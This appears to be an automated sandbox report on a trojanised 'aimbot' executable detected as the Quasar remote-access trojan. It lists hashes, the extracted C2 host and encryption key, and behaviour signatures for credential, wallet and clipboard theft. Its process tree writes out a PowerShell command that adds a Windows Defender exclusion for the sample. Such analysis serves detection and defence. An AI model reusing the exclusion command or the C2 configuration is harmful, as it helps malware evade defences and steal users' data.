Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 04:07
Behavioral task
behavioral1
Sample
SlottedAimV2.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
SlottedAimV2.exe
Resource
win10v2004-20241007-en
General
-
Target
SlottedAimV2.exe
-
Size
7.0MB
-
MD5
decace854bd66eba96581505cbb1f785
-
SHA1
dfd6824e2db3a2ebb89208f0e5f69e6cc1661da6
-
SHA256
ebbdf48aafe6c046eca7512a4e764629559392147518fdf2917751a891bfcd5d
-
SHA512
e55f8afc9a36913aaa24932a94b82100a53accd4f5d8865fc207c9b50c607efa259115d53d5926e0b45c99c0b9dece02996a6b8db5d365af122ccbcdd69823c8
-
SSDEEP
196608:WrSUf0qyleOjmFQR4MVGFtwLPCnL2hVcL:PVXKtM5LPCGcL
Malware Config
Extracted
quasar
1.3.0.0
FORTNITE
hanekese.ddns.net:1005
QSR_MUTEX_uKpgto5HxTzlVefHo9
-
encryption_key
RayN5IunUgPITKqRBUZA
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
mac updater
-
subdirectory
SubDir
Signatures
-
Processes:
powershell.exeflow ioc 52 ip-api.com 65 ip-api.com 1092 powershell.exe 13 ip-api.com -
Quasar family
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\bound.exe family_quasar behavioral2/memory/4864-115-0x0000000000540000-0x000000000059E000-memory.dmp family_quasar -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1092 powershell.exe 1596 powershell.exe 4804 powershell.exe 2416 powershell.exe 2056 powershell.exe 3076 powershell.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
bound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation bound.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 15 IoCs
Processes:
bound.exerar.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exepid process 4864 bound.exe 2288 rar.exe 4616 bound.exe 2376 bound.exe 4612 bound.exe 3456 bound.exe 4048 bound.exe 4036 bound.exe 1108 bound.exe 1520 bound.exe 2172 bound.exe 1648 bound.exe 4420 bound.exe 2976 bound.exe 404 bound.exe -
Loads dropped DLL 17 IoCs
Processes:
SlottedAimV2.exepid process 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe 3588 SlottedAimV2.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 13 ip-api.com 52 ip-api.com 65 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 2360 tasklist.exe 2316 tasklist.exe 2396 tasklist.exe 3436 tasklist.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI18482\python311.dll upx behavioral2/memory/3588-26-0x00007FFE2E700000-0x00007FFE2ECE9000-memory.dmp upx behavioral2/memory/3588-30-0x00007FFE3E480000-0x00007FFE3E4A3000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\libffi-8.dll upx behavioral2/memory/3588-50-0x00007FFE46960000-0x00007FFE4696F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI18482\libcrypto-1_1.dll upx behavioral2/memory/3588-56-0x00007FFE3DFB0000-0x00007FFE3DFDD000-memory.dmp upx behavioral2/memory/3588-58-0x00007FFE3DF90000-0x00007FFE3DFA9000-memory.dmp upx behavioral2/memory/3588-60-0x00007FFE3DE10000-0x00007FFE3DE33000-memory.dmp upx behavioral2/memory/3588-62-0x00007FFE2E220000-0x00007FFE2E390000-memory.dmp upx behavioral2/memory/3588-64-0x00007FFE3D490000-0x00007FFE3D4A9000-memory.dmp upx behavioral2/memory/3588-66-0x00007FFE42A10000-0x00007FFE42A1D000-memory.dmp upx behavioral2/memory/3588-68-0x00007FFE3A4D0000-0x00007FFE3A4FE000-memory.dmp upx behavioral2/memory/3588-72-0x00007FFE2E700000-0x00007FFE2ECE9000-memory.dmp upx behavioral2/memory/3588-73-0x00007FFE2E160000-0x00007FFE2E218000-memory.dmp upx behavioral2/memory/3588-76-0x00007FFE3E480000-0x00007FFE3E4A3000-memory.dmp upx behavioral2/memory/3588-78-0x00007FFE3CDC0000-0x00007FFE3CDD4000-memory.dmp upx behavioral2/memory/3588-80-0x00007FFE3EC50000-0x00007FFE3EC5D000-memory.dmp upx behavioral2/memory/3588-83-0x00007FFE2D7D0000-0x00007FFE2D8EC000-memory.dmp upx behavioral2/memory/3588-75-0x00007FFE2DDE0000-0x00007FFE2E159000-memory.dmp upx behavioral2/memory/3588-118-0x00007FFE3DE10000-0x00007FFE3DE33000-memory.dmp upx behavioral2/memory/3588-127-0x00007FFE2E220000-0x00007FFE2E390000-memory.dmp upx behavioral2/memory/3588-144-0x00007FFE3D490000-0x00007FFE3D4A9000-memory.dmp upx behavioral2/memory/3588-217-0x00007FFE3A4D0000-0x00007FFE3A4FE000-memory.dmp upx behavioral2/memory/3588-281-0x00007FFE2E160000-0x00007FFE2E218000-memory.dmp upx behavioral2/memory/3588-295-0x00007FFE2DDE0000-0x00007FFE2E159000-memory.dmp upx behavioral2/memory/3588-314-0x00007FFE2E220000-0x00007FFE2E390000-memory.dmp upx behavioral2/memory/3588-322-0x00007FFE2D7D0000-0x00007FFE2D8EC000-memory.dmp upx behavioral2/memory/3588-309-0x00007FFE3E480000-0x00007FFE3E4A3000-memory.dmp upx behavioral2/memory/3588-308-0x00007FFE2E700000-0x00007FFE2ECE9000-memory.dmp upx behavioral2/memory/3588-361-0x00007FFE2D7D0000-0x00007FFE2D8EC000-memory.dmp upx behavioral2/memory/3588-362-0x00007FFE2DDE0000-0x00007FFE2E159000-memory.dmp upx behavioral2/memory/3588-372-0x00007FFE2E160000-0x00007FFE2E218000-memory.dmp upx behavioral2/memory/3588-371-0x00007FFE3A4D0000-0x00007FFE3A4FE000-memory.dmp upx behavioral2/memory/3588-370-0x00007FFE42A10000-0x00007FFE42A1D000-memory.dmp upx behavioral2/memory/3588-369-0x00007FFE3D490000-0x00007FFE3D4A9000-memory.dmp upx behavioral2/memory/3588-368-0x00007FFE2E220000-0x00007FFE2E390000-memory.dmp upx behavioral2/memory/3588-367-0x00007FFE3DE10000-0x00007FFE3DE33000-memory.dmp upx behavioral2/memory/3588-366-0x00007FFE3DF90000-0x00007FFE3DFA9000-memory.dmp upx behavioral2/memory/3588-365-0x00007FFE3DFB0000-0x00007FFE3DFDD000-memory.dmp upx behavioral2/memory/3588-364-0x00007FFE46960000-0x00007FFE4696F000-memory.dmp upx behavioral2/memory/3588-363-0x00007FFE3E480000-0x00007FFE3E4A3000-memory.dmp upx behavioral2/memory/3588-360-0x00007FFE3EC50000-0x00007FFE3EC5D000-memory.dmp upx behavioral2/memory/3588-359-0x00007FFE3CDC0000-0x00007FFE3CDD4000-memory.dmp upx behavioral2/memory/3588-347-0x00007FFE2E700000-0x00007FFE2ECE9000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 14 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2288 4864 WerFault.exe bound.exe 3932 4616 WerFault.exe bound.exe 3780 2376 WerFault.exe bound.exe 4228 4612 WerFault.exe bound.exe 3268 3456 WerFault.exe bound.exe 3596 4048 WerFault.exe bound.exe 3016 4036 WerFault.exe bound.exe 2976 1108 WerFault.exe bound.exe 3984 1520 WerFault.exe bound.exe 4272 2172 WerFault.exe bound.exe 4080 1648 WerFault.exe bound.exe 1544 4420 WerFault.exe bound.exe 1632 2976 WerFault.exe bound.exe 1644 404 WerFault.exe bound.exe -
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
bound.exePING.EXEcmd.execmd.execmd.execmd.exePING.EXEbound.execmd.exebound.exePING.EXEchcp.comPING.EXEchcp.comchcp.comPING.EXEPING.EXEbound.exechcp.comPING.EXEchcp.combound.exechcp.comchcp.combound.execmd.exePING.EXEPING.EXEcmd.exechcp.combound.exebound.exebound.execmd.execmd.exePING.EXEPING.EXEcmd.exechcp.comchcp.comcmd.exebound.exebound.execmd.exePING.EXEPING.EXEbound.exechcp.comcmd.exebound.execmd.exebound.exePING.EXEchcp.comchcp.comchcp.comdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 14 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 3532 PING.EXE 4824 PING.EXE 3888 PING.EXE 4004 PING.EXE 1496 PING.EXE 3500 PING.EXE 2092 PING.EXE 4504 PING.EXE 4028 PING.EXE 3260 PING.EXE 3420 PING.EXE 2772 PING.EXE 2452 PING.EXE 996 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 4344 WMIC.exe 3728 WMIC.exe 3076 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs ping.exe 1 TTPs 14 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 3500 PING.EXE 3888 PING.EXE 2092 PING.EXE 996 PING.EXE 4028 PING.EXE 4824 PING.EXE 2452 PING.EXE 3260 PING.EXE 4004 PING.EXE 2772 PING.EXE 3420 PING.EXE 1496 PING.EXE 3532 PING.EXE 4504 PING.EXE -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1092 powershell.exe 3076 powershell.exe 2056 powershell.exe 2056 powershell.exe 1092 powershell.exe 3076 powershell.exe 2416 powershell.exe 2416 powershell.exe 4980 powershell.exe 4980 powershell.exe 4944 powershell.exe 4944 powershell.exe 4980 powershell.exe 4944 powershell.exe 1596 powershell.exe 1596 powershell.exe 1576 powershell.exe 1576 powershell.exe 4804 powershell.exe 4804 powershell.exe 4228 powershell.exe 4228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exepowershell.exepowershell.exepowershell.exeWMIC.exebound.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2316 tasklist.exe Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 2056 powershell.exe Token: SeDebugPrivilege 3076 powershell.exe Token: SeIncreaseQuotaPrivilege 3568 WMIC.exe Token: SeSecurityPrivilege 3568 WMIC.exe Token: SeTakeOwnershipPrivilege 3568 WMIC.exe Token: SeLoadDriverPrivilege 3568 WMIC.exe Token: SeSystemProfilePrivilege 3568 WMIC.exe Token: SeSystemtimePrivilege 3568 WMIC.exe Token: SeProfSingleProcessPrivilege 3568 WMIC.exe Token: SeIncBasePriorityPrivilege 3568 WMIC.exe Token: SeCreatePagefilePrivilege 3568 WMIC.exe Token: SeBackupPrivilege 3568 WMIC.exe Token: SeRestorePrivilege 3568 WMIC.exe Token: SeShutdownPrivilege 3568 WMIC.exe Token: SeDebugPrivilege 3568 WMIC.exe Token: SeSystemEnvironmentPrivilege 3568 WMIC.exe Token: SeRemoteShutdownPrivilege 3568 WMIC.exe Token: SeUndockPrivilege 3568 WMIC.exe Token: SeManageVolumePrivilege 3568 WMIC.exe Token: 33 3568 WMIC.exe Token: 34 3568 WMIC.exe Token: 35 3568 WMIC.exe Token: 36 3568 WMIC.exe Token: SeIncreaseQuotaPrivilege 3568 WMIC.exe Token: SeSecurityPrivilege 3568 WMIC.exe Token: SeTakeOwnershipPrivilege 3568 WMIC.exe Token: SeLoadDriverPrivilege 3568 WMIC.exe Token: SeSystemProfilePrivilege 3568 WMIC.exe Token: SeSystemtimePrivilege 3568 WMIC.exe Token: SeProfSingleProcessPrivilege 3568 WMIC.exe Token: SeIncBasePriorityPrivilege 3568 WMIC.exe Token: SeCreatePagefilePrivilege 3568 WMIC.exe Token: SeBackupPrivilege 3568 WMIC.exe Token: SeRestorePrivilege 3568 WMIC.exe Token: SeShutdownPrivilege 3568 WMIC.exe Token: SeDebugPrivilege 3568 WMIC.exe Token: SeSystemEnvironmentPrivilege 3568 WMIC.exe Token: SeRemoteShutdownPrivilege 3568 WMIC.exe Token: SeUndockPrivilege 3568 WMIC.exe Token: SeManageVolumePrivilege 3568 WMIC.exe Token: 33 3568 WMIC.exe Token: 34 3568 WMIC.exe Token: 35 3568 WMIC.exe Token: 36 3568 WMIC.exe Token: SeDebugPrivilege 4864 bound.exe Token: SeIncreaseQuotaPrivilege 4344 WMIC.exe Token: SeSecurityPrivilege 4344 WMIC.exe Token: SeTakeOwnershipPrivilege 4344 WMIC.exe Token: SeLoadDriverPrivilege 4344 WMIC.exe Token: SeSystemProfilePrivilege 4344 WMIC.exe Token: SeSystemtimePrivilege 4344 WMIC.exe Token: SeProfSingleProcessPrivilege 4344 WMIC.exe Token: SeIncBasePriorityPrivilege 4344 WMIC.exe Token: SeCreatePagefilePrivilege 4344 WMIC.exe Token: SeBackupPrivilege 4344 WMIC.exe Token: SeRestorePrivilege 4344 WMIC.exe Token: SeShutdownPrivilege 4344 WMIC.exe Token: SeDebugPrivilege 4344 WMIC.exe Token: SeSystemEnvironmentPrivilege 4344 WMIC.exe Token: SeRemoteShutdownPrivilege 4344 WMIC.exe Token: SeUndockPrivilege 4344 WMIC.exe Token: SeManageVolumePrivilege 4344 WMIC.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
bound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exebound.exepid process 4864 bound.exe 4616 bound.exe 2376 bound.exe 4612 bound.exe 3456 bound.exe 4048 bound.exe 4036 bound.exe 1108 bound.exe 1520 bound.exe 2172 bound.exe 1648 bound.exe 4420 bound.exe 2976 bound.exe 404 bound.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SlottedAimV2.exeSlottedAimV2.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1848 wrote to memory of 3588 1848 SlottedAimV2.exe SlottedAimV2.exe PID 1848 wrote to memory of 3588 1848 SlottedAimV2.exe SlottedAimV2.exe PID 3588 wrote to memory of 2328 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2328 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2864 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2864 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2976 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2976 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 4168 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 4168 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 3116 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 3116 3588 SlottedAimV2.exe cmd.exe PID 2976 wrote to memory of 3076 2976 cmd.exe powershell.exe PID 2976 wrote to memory of 3076 2976 cmd.exe powershell.exe PID 2864 wrote to memory of 1092 2864 cmd.exe powershell.exe PID 2864 wrote to memory of 1092 2864 cmd.exe powershell.exe PID 3116 wrote to memory of 2316 3116 cmd.exe tasklist.exe PID 3116 wrote to memory of 2316 3116 cmd.exe tasklist.exe PID 2328 wrote to memory of 2056 2328 cmd.exe powershell.exe PID 2328 wrote to memory of 2056 2328 cmd.exe powershell.exe PID 4168 wrote to memory of 4864 4168 cmd.exe bound.exe PID 4168 wrote to memory of 4864 4168 cmd.exe bound.exe PID 4168 wrote to memory of 4864 4168 cmd.exe bound.exe PID 3588 wrote to memory of 4604 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 4604 3588 SlottedAimV2.exe cmd.exe PID 4604 wrote to memory of 3568 4604 cmd.exe WMIC.exe PID 4604 wrote to memory of 3568 4604 cmd.exe WMIC.exe PID 3588 wrote to memory of 1088 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 1088 3588 SlottedAimV2.exe cmd.exe PID 1088 wrote to memory of 2464 1088 cmd.exe reg.exe PID 1088 wrote to memory of 2464 1088 cmd.exe reg.exe PID 3588 wrote to memory of 2064 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2064 3588 SlottedAimV2.exe cmd.exe PID 2064 wrote to memory of 1596 2064 cmd.exe reg.exe PID 2064 wrote to memory of 1596 2064 cmd.exe reg.exe PID 3588 wrote to memory of 2772 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2772 3588 SlottedAimV2.exe cmd.exe PID 2772 wrote to memory of 4344 2772 cmd.exe WMIC.exe PID 2772 wrote to memory of 4344 2772 cmd.exe WMIC.exe PID 3588 wrote to memory of 2244 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2244 3588 SlottedAimV2.exe cmd.exe PID 2244 wrote to memory of 3728 2244 cmd.exe WMIC.exe PID 2244 wrote to memory of 3728 2244 cmd.exe WMIC.exe PID 3588 wrote to memory of 436 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 436 3588 SlottedAimV2.exe cmd.exe PID 436 wrote to memory of 2416 436 cmd.exe powershell.exe PID 436 wrote to memory of 2416 436 cmd.exe powershell.exe PID 3588 wrote to memory of 1780 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 1780 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2588 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2588 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2920 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2920 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 1340 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 1340 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 4244 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 4244 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2984 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2984 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 4708 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 4708 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2788 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 2788 3588 SlottedAimV2.exe cmd.exe PID 3588 wrote to memory of 4432 3588 SlottedAimV2.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SlottedAimV2.exe"C:\Users\Admin\AppData\Local\Temp\SlottedAimV2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\SlottedAimV2.exe"C:\Users\Admin\AppData\Local\Temp\SlottedAimV2.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SlottedAimV2.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SlottedAimV2.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
-
